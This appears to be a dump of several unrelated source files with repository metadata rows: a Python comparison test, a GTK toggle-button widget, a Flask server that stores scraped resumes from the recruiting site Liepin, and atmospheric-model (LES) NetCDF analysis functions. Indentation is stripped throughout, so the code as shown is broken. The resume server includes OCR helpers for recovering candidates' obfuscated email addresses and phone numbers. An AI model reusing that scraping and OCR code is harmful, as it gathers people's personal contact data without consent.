self.assertTrue(int <= str or int >= str)
self.assertTrue(cmp(int, str) != 0)
self.assertTrue(int is int)
self.assertTrue(str == str)
self.assertTrue(int != str)
def test_cell_comparisons(self):
def f(x):
if x:
y = 1
def g():
return x
def h():
return y
return g, h
g, h = f(0)
g_cell, = g.func_closure
h_cell, = h.func_closure
self.assertTrue(h_cell < g_cell)
self.assertTrue(g_cell >= h_cell)
self.assertEqual(cmp(g_cell, h_cell), 1)
self.assertTrue(g_cell is g_cell)
self.assertTrue(g_cell == g_cell)
self.assertTrue(h_cell == h_cell)
self.assertTrue(g_cell != h_cell)
def test_main():
run_unittest(TestImplementationComparisons)
if __name__ == '__main__':
test_main()
| apache-2.0 | -8,986,443,526,133,241,000 | 28.153846 | 56 | 0.559367 | false | 3.632588 | true | false | false |
frc1418/2014 | driver_station/src/ui/widgets/toggle_button.py | 1 | 2782 | #
# This file is part of KwarqsDashboard.
#
# KwarqsDashboard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# KwarqsDashboard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with KwarqsDashboard. If not, see <http://www.gnu.org/licenses/>.
#
import gtk
import gobject
from .image_button import ImageButton
class ToggleButton(gtk.HBox):
'''
Similar to a GTK CheckButton, but different. A different pixbuf is
shown depending on the button toggled state.
.. seems like they should already have this implemented, but I can't
find one.
'''
__gsignals__ = {
'toggled': (gobject.SIGNAL_ACTION, gobject.TYPE_NONE, ()),
}
def __init__(self, active_pixbuf, inactive_pixbuf, label=None, clickable=False, default=False):
'''
:param active_pixbuf: The pixbuf to be shown when the button is in the 'active' state
:param inactive_pixbuf: The pixbuf to be shown when the button is in the 'inactive' state
:param label: Text to show with the button
:param clickable: Does the button accept user input?
:param default: The default state for the button: True is active, False is inactive
'''
gtk.HBox.__init__(self)
self.set_spacing(5)
self.image_button = ImageButton()
self.pack_start(self.image_button, False, False)
self.active = not default
self.active_pixbuf = active_pixbuf
self.inactive_pixbuf = inactive_pixbuf
if clickable:
self.image_button.connect('clicked', self.on_clicked)
if label is not None:
self.label = gtk.Label(label)
self.pack_start(self.label, False, False)
self.set_active(default)
def on_clicked(self, widget):
self.set_active(not self.active)
def get_active(self):
return self.active
def set_active(self, active):
if active != self.active:
self.active = active
if active:
self.image_button.set_from_pixbuf(self.active_pixbuf)
else:
self.image_button.set_from_pixbuf(self.inactive_pixbuf)
self.emit('toggled')
gobject.type_register(ToggleButton)
| bsd-3-clause | 515,769,753,873,767,230 | 33.775 | 103 | 0.614666 | false | 4.221548 | false | false | false |
followcat/predator | plugins/server/run.py | 1 | 4418 | # -*- coding: utf-8 -*-
import bs4
import time
import flask
import flask_restful
from flask_restful import Resource, reqparse
import tools.image
class LiepinPluginSyncObject(object):
committer = 'PLUGIN'
def __init__(self, url, htmlsource, base64email, base64phone):
self.url = url
self.htmlsource = htmlsource
self.base64email = base64email
self.base64phone = base64phone
self.raw_html, self.raw_yaml = self.parse_source()
self.info = self.generate_yaml()
self.loginfo = ''
self.parse_result = False
def generate_yaml(self):
info = dict()
info.update(self.raw_yaml)
info['committer'] = 'PLUGIN'
info['origin'] = u'猎聘爬取'
#info['email'] = self.email_from_base64()
#info['phone'] = self.phone_from_base64()
return info
def email_from_base64(self):
img = tools.image.image_from_base64(self.base64email)
preimg = tools.image.preprocess(img)
result = tools.image.image_to_string(preimg)
return result.replace(' ', '')
def phone_from_base64(self):
img = tools.image.image_from_base64(self.base64phone)
preimg = tools.image.preprocess(img)
result = tools.image.image_to_string(preimg)
return result.replace(' ', '')
def parse_source(self):
bs = bs4.BeautifulSoup(self.htmlsource, 'lxml')
details = dict()
details['date'] = time.time()
details['filename'] = self.url
idtag = bs.find('span', attrs={'data-nick':'res_id'})
details['id'] = idtag.text
details['originid'] = idtag.text
login_form = bs.find(class_='user-login-reg')
if login_form is not None:
self.loginfo = 'NoLoginError'
self.parse_result = False
return '', {}
side = bs.find(class_='side')
side.decompose()
footer = bs.find('footer')
footer.decompose()
javascripts = bs.findAll('script')
for js in javascripts:
js.decompose()
alinks = bs.findAll('a')
for a in alinks:
a.decompose()
content = bs.find(class_='resume')
self.parse_result = True
return content.prettify(), details
def add_new(self, cvstorage):
result = False
if self.info['id']:
if len(self.raw_html) < 500:
self.loginfo = (' ').join([self.info['id'], 'too short.'])
else:
if not cvstorage.exists(self.info['id']):
result = cvstorage.addcv(self.info['id'],
self.raw_html.encode('utf-8'), self.info)
else:
self.loginfo = (' ').join([self.info['id'], 'exists'])
else:
self.loginfo = "without ID."
if result is True:
print((' ').join(["Plugin add Liepin", self.info['id']]))
else:
print((' ').join(["Plugin add Liepin failed", self.loginfo]))
return result
class BrowserSyncAPI(Resource):
def __init__(self):
super(BrowserSyncAPI, self).__init__()
self.reqparse = reqparse.RequestParser()
self.LIEPIN_STO_CV = flask.current_app.config['LIEPIN_STO_CV']
self.reqparse.add_argument('url', type = unicode, location = 'json')
self.reqparse.add_argument('html', type = unicode, location = 'json')
self.reqparse.add_argument('base64email', type = unicode, location = 'json')
self.reqparse.add_argument('base64phone', type = unicode, location = 'json')
def post(self):
args = self.reqparse.parse_args()
url = args['url']
html = args['html']
base64email = args['base64email']
base64phone = args['base64phone']
id = ''
result = False
if 'liepin' in url:
lpso = LiepinPluginSyncObject(url, html, base64email, base64phone)
result = lpso.add_new(self.LIEPIN_STO_CV)
if result is True:
id = lpso.info['id']
return {'code': 200, 'url': url, 'result': result, 'id': id}
app = flask.Flask(__name__)
app.config.from_object('plugins.server.settings')
api = flask_restful.Api(app)
api.add_resource(BrowserSyncAPI, '/api/browsersync', endpoint = 'browsersync')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5888, threaded=True)
| lgpl-3.0 | 8,573,186,696,191,516,000 | 33.186047 | 86 | 0.570748 | false | 3.605887 | false | false | false |
JaakkoAhola/DESIGN | LES2emu.py | 1 | 35416 | # Functions extracting emulator and any other data from LES output NetCDF files,
# and collection of functions for generating LES inputs.
#
# Tomi Raatikanen 18.1.2019
#
# Functions
# =========
# Use Python import to make these functions available, e.g. from LES2emu import GetEmuVars, get_netcdf_variable
#
# a) Functions for extracting data from the LES outputs
# GetEmu2Vars(path)
# GetEmu1Vars(fname,tstart,tend,[ttol,start_offset,end_offset])
# get_netcdf_variable(fname,var_name,target_time,[end_time])
# extract_write_data(fname_template,specs,[name_out,nmax])
# get_netcdf_updraft(fname,tstart,tend,[ttol,tol_clw])
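#
#	Example for (a), a minimal sketch (the file path below is hypothetical and the target time is
#	illustrative; 'cfrac' is one of the time-statistics variables read elsewhere in this module):
#		from LES2emu import get_netcdf_variable
#		fname = '/path/to/emul01/emul01.ts.nc'
#		cfrac_3h = get_netcdf_variable(fname,'cfrac',3.0*3600)	# value at/near t=3 h (see the function below for details)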
#
# b) Functions for generating LES inputs
# calc_cloud_base(p_surf,theta,rw)
# calc_lwc_altitude(p_surf,theta,rw,zz)
# solve_rw(p_surf,theta,lwc,zz)
# solve_rw_lwp(p_surf,theta,lwp,pblh)
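#
#	Example for (b), a sketch only: the numeric values are illustrative and the assumed units
#	(p_surf in Pa, theta in K, rw/lwc in kg/kg, lwp in kg/m^2, zz/pblh in m) should be verified
#	against the function definitions below.
#		from LES2emu import calc_cloud_base, solve_rw_lwp
#		zb = calc_cloud_base(101780.,292.5,9.6e-3)	# cloud base altitude for given surface pressure, theta and total water
#		rw = solve_rw_lwp(101780.,292.5,0.05,800.)	# total water mixing ratio giving the target LWP for the given PBL height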
#
# c) Helper functions
# calc_psat_w(T)
# calc_sat_mixr(p,T)
# calc_rh(rw,T,press)
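#
#	Example for (c), a sketch; assumes T in K, pressures in Pa and mixing ratio in kg/kg
#	(verify against the definitions below):
#		from LES2emu import calc_psat_w, calc_sat_mixr, calc_rh
#		psat = calc_psat_w(283.15)	# saturation vapour pressure of water
#		rs = calc_sat_mixr(100000.,283.15)	# saturation mixing ratio
#		rh = calc_rh(7.0e-3,283.15,100000.)	# relative humidity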
#
# Notes
# =====
# 1) Input file name should contain complete path in addition to the file name
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# 2) Voima requires python 2.7.10, so execute "module load Python/2.7.10"
#
def GetEmu1Vars(fname,tstart,tend,ttol=3600.,start_offset=0,end_offset=0):
# Function calculates LES output variables for emulator v1.0 as defined in the ECLAIR proof-of-concept document
# https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
# Inputs:
# fname Complete path and name of a time statistics file (*.ts.nc)
# start, tend Time window (s)
# Optional inputs
	#	ttol			Time tolerance (s) for finding averaging window
	#	start_offset	Point offset to the start index (time in the NetCDF files is the save time, so typically the first point should be ignored)
	#	end_offset		-||- to the end index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# tstart=2.5*3600
# tend=3.5*3600
# cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std = GetEmu1Vars(file,tstart,ttol=10.,start_offset=1)
#
import os
import netCDF4 as netcdf
import numpy
#
# Outputs
cfrac=-999. # Cloud fraction
CDNC=-999. # Cloud droplet number concentration in cloudy columns (#/kg)
prcp=-999. # Precipitation tendency = domain mean surface precipitation (kg/m^2/s)
dn=-999. # In-cloud aerosol number loss tendency = change in interstitial aerosol+cloud droplet number concentration in cloudy columns (#/kg/s)
	we=-999.		# Mixing between FT and BL = domain mean entrainment velocity (m/s)
#
# ... and their standard deviations
cfrac_std=-999.; CDNC_std=-999.; prcp_std=-999.; dn_std=-999.; we_std=-999.
#
# File must exist
if not os.path.lexists(fname):
print fname+' not found!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
# Time
# ====
if 'time' not in ncid.variables:
print 'Time not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
times = ncid.variables['time']
#
# Find the closest matching time points
ind_tstart=0
ind_tend=0
i=0
for t in times:
if abs(t-tstart)<abs(times[ind_tstart]-tstart): ind_tstart=i
if abs(t-tend)<abs(times[ind_tend]-tend): ind_tend=i
i+=1
#
if abs(times[ind_tstart]-tstart)>ttol or abs(times[ind_tend]-tend)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
	# Apply offset (typically the first point is ignored)
ind_tstart+=start_offset
ind_tend+=end_offset
if ind_tstart<0 or ind_tstart>ind_tend or ind_tend>=len(times):
print 'Invalid data range for '+fname+': ',ind_tstart,ind_tend,len(times)
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
#
# Outputs
# ========
# Cloud fraction
if 'cfrac' not in ncid.variables:
print 'Cloud fraction not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Need cloud fractions for normalizing domain mean interstitial and cloud droplet number concentrations
cfrac_ts=ncid.variables['cfrac'][ind_tstart:ind_tend]
ncfrac = sum( cfrac_ts>0.0 ) # The number of non-zero cloud fractions
#
cfrac = numpy.mean( cfrac_ts )
cfrac_std = numpy.std( cfrac_ts )
#
if 'Nc_ic' in ncid.variables: # Level 4 = SALSA microphysics
# Cloud droplet number concentration averaged over cloudy columns (#/kg)
CDNC,CDNC_std=average_scaled(ncid.variables['Nc_ic'][ind_tstart:ind_tend],cfrac_ts)
#
# Surface precipitation (kg/m^2/s)
if ind_tstart < ind_tend:
prcp = numpy.mean( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
prcp_std = numpy.std( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
else:
prcp = ncid.variables['rmH2Opr'][ind_tstart]
prcp_std = -999.
#
# Change in in-cloud aerosol+cloud droplet number concentration
if ncfrac>=2: # Linear fit needs at least two data points
tt = ncid.variables['time'][ind_tstart:ind_tend] # Time (s) vector
nc = ncid.variables['Nc_ic'][ind_tstart:ind_tend] # Cloud droplets (domain mean)
nc += ncid.variables['Na_int'][ind_tstart:ind_tend] # + interstitial aerosol (domain mean)
# Normalize by cloud fraction => concentrations for cloudy columns
i=0
for cf in cfrac_ts:
if cf>0:
nc[i]/=cf
else:
# Divide-by-zero => NaN
nc[i]=float('nan')
i+=1
#
a,dn,a_std,dn_std=ls_fit(tt,nc) # Least squares fit (nc=a+b*tt)
else:
dn=-999.
dn_std=-999.
else: # Level 3 = saturation adjustment method (given CDNC)
# Cloud droplet number concentration (#/kg): fixed
if ind_tstart < ind_tend:
CDNC = numpy.mean( ncid.variables['CCN'][ind_tstart:ind_tend] )
CDNC_std = numpy.std( ncid.variables['CCN'][ind_tstart:ind_tend] )
else:
CDNC = ncid.variables['CCN'][ind_tstart]
CDNC_std = -999.
#
# Surface precipitation (kg/m^2/s): variable prcp is in W/m^2=J/s/m^2, which can be
# converted to kg using latent heat of vaporization (2.5e+06 J/kg)
if ind_tstart < ind_tend:
prcp = numpy.mean( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
prcp_std = numpy.std( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
else:
prcp = ncid.variables['prcp'][ind_tstart]/2.5e6
prcp_std = -999.
#
# Change in in-cloud aerosol+cloud droplet number concentration: N/A
#
# Entrainment velocity (m/s)
# we=dz/dt+D*z, where z is PBL height and D is large scale divergence (1.5e-6 1/s) (see e.g. Kazil et al., ACP, 2016).
if ind_tstart < ind_tend:
		# Must have at least two points for the slope, but should have more than that
zz = ncid.variables['zi1_bar'][ind_tstart:ind_tend] # PBL height (m) vector
tt = ncid.variables['time'][ind_tstart:ind_tend] # Time (s) vector
a,dzdt,a_std,dzdt_std=ls_fit(tt,zz) # Least squares fit (zz=a+b*tt)
z=numpy.mean(zz) # Mean PBL height
we=dzdt+1.5e-6*z
we_std=dzdt_std
else:
we = -999.
we_std = -999.
#
# Close file
ncid.close()
#
# All done
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
def get_netcdf_updraft(fname,tstart,tend,ttol=3600.,tol_clw=1e-5):
# Function for calculating mean positive updraft velocities and cloud droplet number concentrations
# at cloud base (see Romakkaniemi et al., 2009) from 4D data (*.nc).
#
# Romakkaniemi, S., G. McFiggans, K.N. Bower, P. Brown, H. Coe, T.W. Choularton, A comparison between
# trajectory ensemble and adiabatic parcel modelled cloud properties and evaluation against airborne
# measurements, J. Geophys. Res., doi:10.1029/2008JD011286, 2009
#
# Inputs:
# fname Complete file path and name (*.nc)
	# tstart, tend	Averaging time window (s)
# Optional inputs
	# ttol	Time tolerance (s) for finding averaging window
# tol_clw Cloud liquid water mixing ratio (kg/kg) for the cloud base
#
# Example:
# file='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/emul001/emul001.nc'
# w,cdnc,cdnc_w,n=get_netcdf_updraft(file,9000.,12600.,ttol=10.)
# print w,cdnc,cdnc_w,n
#
import os
import netCDF4 as netcdf
import numpy
#
# File must exist
if not os.path.lexists(fname):
raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif 'w' not in ncid.variables:
raise RuntimeError('Variable w not found from '+fname+'!')
elif 'l' not in ncid.variables:
raise RuntimeError('Variable l not found from '+fname+'!')
elif 'time' not in ncid.variables['w'].dimensions or 'time' not in ncid.variables['l'].dimensions:
raise RuntimeError('Time is not a dimension for w or l (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Dimensions
dims=ncid.variables['l'][0,].shape # x, y, z
#
# Optional: CDNC from UCLALES-SALSA simulations
cdnc_calc='S_Nc' in ncid.variables
#
#
# Outputs
wpos=0. # Mean positive updraft velocity at the cloud base (m/s)
w2pos=0. # Velocity weighted mean positive updraft velocity at the cloud base (m/s)
cdnc_p=0. # Mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
	cdnc_wp=0.	# Velocity weighted mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
n=0 # Number of cloud bases with positive updraft (-)
#
ind=-1
for tt in times:
# Time range
ind+=1
if tt<tstart-ttol:
continue
elif tt>tend+ttol:
break # Assuming monotonic time
#
# Data
w=ncid.variables['w'][ind,]
l=ncid.variables['l'][ind,]
if cdnc_calc: cdnc=ncid.variables['S_Nc'][ind,]
#
# Calculations
if True:
# This is much faster
for i in range(0,dims[0]):
for j in range(0,dims[1]):
kk, = numpy.where(l[i,j,:]>tol_clw)
if len(kk)>0 and w[i,j,kk[0]]>0.:
k=kk[0]
n+=1
wpos+=w[i,j,k]
w2pos+=w[i,j,k]**2
if cdnc_calc:
cdnc_p+=cdnc[i,j,k]
cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
else:
# The old method
i=0; j=0
while i<dims[0] and j<dims[1]:
k=0
while k<dims[2]:
if l[i,j,k]>tol_clw:
# Found cloud base, but only the positive updraft velocities are counted
if w[i,j,k]>0.:
n+=1
wpos+=w[i,j,k]
w2pos+=w[i,j,k]**2
if cdnc_calc:
cdnc_p+=cdnc[i,j,k]
cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
break
k+=1
if j+1<dims[1]:
j+=1
else:
i+=1
j=0
#
if n>0:
w2pos/=wpos
wpos/=n
if cdnc_calc:
cdnc_p/=n
cdnc_wp/=(wpos*n)
else:
cdnc_p=-999.
cdnc_wp=-999.
else:
wpos=-999.
w2pos=-999.
cdnc_p=-999.
cdnc_wp=-999.
#
# Close file
ncid.close()
#
# Outputs: mean positive updraft velocity and cloud droplet number concentrations (mean and weighted with velocity) at the cloud base
return wpos,w2pos,cdnc_p,cdnc_wp,n
def get_netcdf_variable(fname,var_name,start_time,end_time=-10000.,ttol=3600.,start_offset=0,end_offset=0):
# Function for extracting data from a NetCDF file based on the given time value (or range).
#
# Inputs:
# fname Complete file path and name
# var_name NetCDF variable name
# start_time Target or start (when end_time is specified) time value
# Optional inputs
# end_time Optional end time value
	# ttol	Time tolerance (s) for finding averaging window
# start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
# end_offset -||- end index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# lmax=get_netcdf_variable(file,'lmax',3*3600,ttol=10)
# lmax=get_netcdf_variable(file,'lmax',2.5*3600,3.5*3600,ttol=10.,start_offset=1)
import os
import numpy
import netCDF4 as netcdf
#
# File must exist
if not os.path.lexists(fname): raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif var_name not in ncid.variables:
raise RuntimeError('Variable '+var_name+' not found from '+fname+'!')
elif 'time' not in ncid.variables[var_name].dimensions:
raise RuntimeError('Time is not a dimension for '+var_name+' (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Find the correct time value
i=0
if end_time>-9999.:
		# Time from start_time to end_time (closest matching start and end time values)
ind_start=0
ind_end=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind_start]-start_time): ind_start=i
if abs(tt-end_time)<abs(times[ind_end]-end_time): ind_end=i
i+=1
#
if abs(times[ind_start]-start_time)>ttol or abs(times[ind_end]-end_time)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return -999.
#
		# Apply offset (typically the first point is ignored)
ind_start+=start_offset
ind_end+=end_offset
if ind_start<0 or ind_start>ind_end or ind_end>=len(times):
print 'Invalid data range for '+fname+'!'
return -999.
#
# Average over time dimension
ind=ncid.variables[var_name].dimensions.index('time')
#
out=numpy.mean( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
# Could add standard deviations?
#out_std = numpy.std( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
else:
# Single time value (closest match)
ind=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind]-start_time): ind=i
i=i+1
#
		if abs(times[ind]-start_time)>ttol:
print 'Matching time not found from '+fname+'!'
return -999.
#
		# Apply offset (typically the first point is ignored)
ind+=start_offset
if ind<0 or ind>=len(times):
print 'Invalid index for '+fname+'!'
return -999.
#
out=ncid.variables[var_name][ind,]
#
# Close file
ncid.close()
return out
def GetEmu2Vars(path):
# Function calculates LES output variables for emulator v2.0 as defined in the ECLAIR proof-of-concept document
# https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
#
# Inputs:
# path Complete path the root data
# Outputs:
# A 2D array of values as described below
#
# Example:
# path='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/'
# data=GetEmu2Vars(path)
#
import os
#
# Time window
tstart=2.5*3600
tend=3.5*3600
#
if path.endswith('/'):
fmt='emul%03u/emul%03u'
else:
fmt='/emul%03u/emul%03u'
#
# Examine the data files
out=[]
i=1
while True:
# Data must exist
if not os.path.lexists( (path+fmt+'.nc')%(i,i) ) and not os.path.lexists( (path+fmt+'.ts.nc')%(i,i) ):
if i==1:
raise RuntimeError('Data not found from '+path+'!')
else:
break
#
# Emulator v2.0 variables
# - Tolerance for the start and end times is +/- 10 s
# - No need to ignore the first point when averaging instantaneous variables (rain processes and w calculated form 4D data,)
		# - No need to ignore the first point when averaging instantaneous variables (rain processes and w calculated from 4D data)
# Data file
file=(path+fmt+'.ts.nc')%(i,i)
# 1a) Rain water loss (evaporation + surface precipitation)
# Change in column rain water due to condensation (kg/m^2/s)
cond=get_netcdf_variable(file,'cond_rr',tstart,tend,ttol=10.)
# Change in column rain water due to sedimentation (kg/m^2/s)
sedi=get_netcdf_variable(file,'sedi_rr',tstart,tend,ttol=10.)
#
# 1b) Rain water production (not including divergence - with that the total production is the same as total loss)
# Change in column rain water due to coagulation (kg/m^2/s)
coag=get_netcdf_variable(file,'coag_rr',tstart,tend,ttol=10.)
# Change in column rain water due to autoconversion (kg/m^2/s)
auto=get_netcdf_variable(file,'auto_rr',tstart,tend,ttol=10.)
# Change in column rain water due to diagnostics (kg/m^2/s)
diag=get_netcdf_variable(file,'diag_rr',tstart,tend,ttol=10.)
#
		# 2) Precipitation statistics (ignore the first point, which is an average from the previous time period)
# Surface precipitation rate (W/m^2)
prcp=get_netcdf_variable(file,'prcp',tstart,tend,ttol=10.,start_offset=1)
# 1 W = J/s, which can be converted to mass flux by using latent heat of water (2.5e+6 J/kg)
prcp/=2.5e6 # kg/m^2/s
#
# 3) Cloud base positive updraft velocity (m/s)
file_4d=(path+fmt+'.nc') % (i,i)
wpos,w2pos,cdnc_p,cdnc_wp,n = get_netcdf_updraft(file_4d,tstart,tend,ttol=10.)
#
out.append([i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n])
#
if i==1: print 'id cond sedi coag auto diag prcp wpos w2pos cdnc_p cdnc_wp n'
print ('%2g %8.3e %8.3e %8.3e %8.3e %8.3e %8.3e %6.4f %6.4f %7.3e %7.3e %7g')%(i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n)
#
i+=1
#
# Output lines are: id, cond, sedi, coag, auto, diag, prcp, wpos, w2pos, cdnc_p, cdnc_wp, n
return out
def extract_write_data(fname_template,specs,name_out='',nmax=9999,skip_errs=False):
# Extract and process data from one or more NetCDF files, and write it to a text file (optional)
#
# Inputs:
# fname_template File name template with complete path
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
	# specs	List of variables including slicing and numpy operations
# name_out Output file name (optional)
# nmax Maximum number of files (optional)
# skip_errs Don't stop on errors - needed when complete data set is not available (saves just NaN)
#
# Examples:
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
# specs=['cfrac[10]','wmax[10]','lwp_bar[10]']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
# specs=['cfrac']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ps.nc'
# specs=['numpy.amax(l[10,:])']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.nc'
# specs=['numpy.amax(numpy.amax(numpy.amax(l[2,:],axis=0),axis=0),axis=0)']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
import os
import netCDF4 as netcdf
import numpy
import sys
#
# Function for converting command line commands to NetCDF format
def interpret_fun(cmd):
# Interpret function call, e.g. 'numpy.amax(l[89,:])': just replace variable name x with "ncid.variables['x']",
# e.g. 'numpy.amax(l[2,100,100,:])', numpy.amax(l[89,:])',numpy.amax(l)' or 'numpy.amax(P_Rwca,axis=0)'
# Now also function calls like "thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]" are accepted!
frst=-1
lst=-1
i=0
for tt in cmd:
if (tt=='[' or tt==')' or tt==',') and lst==-1:
# e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l)', 'numpy.amax(P_Rwca,axis=0)' or thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]"
lst=i
if frst==0:
fun='ncid.variables[\''+cmd[frst:lst]+'\']'+cmd[lst:]
else:
fun=cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
return fun
elif tt=='(' or i==0:
frst=i
i+=1
# No solution
return cmd
#
# The old version
frst=-1
lst=-1
i=0
for tt in cmd:
if (tt=='[' or tt==')' or tt==',') and lst==-1:
# e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l)' or 'numpy.amax(P_Rwca,axis=0)'
lst=i
elif tt=='(':
frst=i
i+=1
# Return complete command as fun
fun=cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
return fun
#
#
# Any '%' in file name template will be replaced by counter i=1,2,3,...
n=fname_template.count('%')
if n==0: nmax=1 # Template as is
#
# Output to text file
if len(name_out): fid_out=open(name_out,'w')
#
nerr=0
files=0 # Count files
values=0 # Count values extracted
out=[] # Complete output
for i in range(1,nmax):
# File name with full path
if n==0:
file_name=fname_template
elif n==1:
file_name=fname_template % (i)
elif n==2:
file_name=fname_template % (i,i)
elif n==3:
file_name=fname_template % (i,i,i)
else:
# No more than three?
file_name=fname_template % (i,i,i,i)
#
ncid=0
if not os.path.isfile(file_name):
if i==1 and n>0: print file_name+' not found!'
if not skip_errs or i>90:
break
else:
# Ignore missing file (<90)
ncid=-999
nerr+=1
msg=file_name+' not found!'
#
#
#row=[] # one row
#for nam in specs:
# row.append(obj)
#
#out.append(row)
#
# Save data
#if len(name_out):
# # Save variables as space separated strings
# if not hasattr(obj, '__iter__'):
# # Scalar
# fid_out.write( str(obj)+" " )
# values+=1
# else:
# # Vector
# for val in obj:
# fid_out.write( str(val)+" " )
# values+=1
#
#continue
#
# Open input file
if ncid==0: ncid = netcdf.Dataset(file_name,'r')
#
# Outputs
row=[] # one row
for nam in specs:
# Interpret command
if ncid<0:
# File not found
obj = float('nan') # Scalar works quite often
elif '(' in nam:
# There is a call to a function
fun=interpret_fun(nam)
try:
obj =eval( fun )
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
elif '[' in nam:
# Selected data range
name=nam[:nam.index('[')]
ind=nam[nam.index('['):]
try:
obj =eval( 'ncid.variables[\''+name+'\']'+ind )
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
else:
# Data as is
try:
obj = ncid.variables[nam][:]
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
#
# Append data
row.append(obj)
#
# Save data
if len(name_out):
# Save variables as space separated strings
if not hasattr(obj, '__iter__'):
# Scalar
fid_out.write( str(obj)+" " )
values+=1
else:
# Vector/matrix
for val in obj:
if not hasattr(val, '__iter__'):
# Scalar (1D vector)
fid_out.write( str(val)+" " )
values+=1
else:
# Vector (2D matrix)
for val2 in val:
fid_out.write( str(val2)+" " )
values+=1
#
# New line
if len(name_out): fid_out.write( "\r\n" )
#
out.append(row)
#
if ncid>0: ncid.close()
files+=1
#
if len(name_out):
fid_out.close()
print str(files)+' files examined, '+str(values)+' values saved to '+name_out
if nerr>0: print ' '+str(nerr)+' error(s) ignored: ',msg
#
# Return the data
return out
#
# LES inputs and outputs
#
def calc_cloud_base(p_surf,theta,rw):
